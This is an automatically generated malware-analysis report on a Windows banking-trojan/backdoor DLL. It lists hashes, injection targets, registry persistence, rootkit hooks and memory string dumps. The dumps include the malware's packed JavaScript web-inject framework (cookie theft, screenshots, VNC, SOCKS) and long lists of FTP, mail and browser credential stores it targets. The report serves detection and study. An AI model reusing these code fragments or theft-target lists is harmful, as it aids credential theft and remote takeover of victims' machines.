Gen.Variant.Kazy.431832_b26754847a

by malwarelabrobot on December 9th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.431832 (B) (Emsisoft), Gen:Variant.Kazy.431832 (AdAware), GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b26754847ae28a3f0c76996465fe8efd
SHA1: 3cc0523d2a8c83865bf5f0da6d9fde936ae5fbeb
SHA256: 461bf5a9d35e55105b4452d35b0fa112d3a652045b3559ba960abfe3c3fb2ca0
SSDeep: 6144:07KmU slGYOk/0BpdPyXUtVZW6Exufqz60n5D/OUTS8 1h:wU ZYOk2xhV5ExuUln5Dl Zh
Size: 344064 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-08-12 08:59:08
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:212

The Trojan injects its code into the following process(es):

imapi.exe:1780
vmacthlp.exe:928
Explorer.EXE:880
spoolsv.exe:1444
jqs.exe:1976

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\OfumVism\IfarZozip.dat (269 bytes)

Registry activity

The process regsvr32.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 0D F2 5C A4 70 3E 9F 4D 65 EF E6 16 C0 F4 F1"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"DefaultLevel" = "262144"

[HKCU\Software\Classes\CLSID\{7BD47FDD-1028-4944-A268-024C76A61BA9}]
"#sd" = "63 3A 5C 62 32 36 37 35 34 38 34 37 61 65 32 38"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"PolicyScope" = "0"
"TransparentEnabled" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"IfarZozip" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\IfarZozip\IfarZozip.dat"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths]
[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}]

The process vmacthlp.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Classes\CLSID\{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}]
"{4E153850-602D-4819-B83D-3CCD0A1E7351}" = "15 B3 99 DC"

Dropped PE files

MD5 File path
7c83e70fa2ddbdd6d0673188f97f19bf c:\Documents and Settings\All Users\Application Data\IfarZozip\IfarZozip.dat

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateProcessA
CreateProcessW

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 278871 282624 5.16477 d41dbb87f3c74ce1dd0e967756955ef1
.data 286720 7828 4096 1.2978 07bc0f43cd29f2123eab3f113b8e24f0
.CRT 294912 309 4096 0.581961 5201ba5b9b5aeb2b5db56d15e9c563e1
/WPW 299008 4691 8192 3.49972 4b71a8d550b4aa0d3214773663f393ea
.5kw6BD 307200 176 4096 0.368689 6c1b6d77ca788505629a9a497490be01
.edata 311296 23939 24576 5.10176 5479e019771528f197b5df4cc983e94a
.bss 335872 2330 4096 3.46911 c6929707cdf991da532e33e704be8a81
.reloc 339968 229 4096 0.444542 49228fa7481f82fe99f1dc41b0e934b2
.reloc 344064 1326 4096 0.734733 ddd37b19754bb52eb60dfdd14eeaf3dc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

Explorer.EXE_880_rwx_01E50000_00054000:

%Documents and Settings%\All Users\Application Data\IfarZozip\IfarZozip.dat
.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

Explorer.EXE_880_rwx_01EF0000_0007B000:

.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
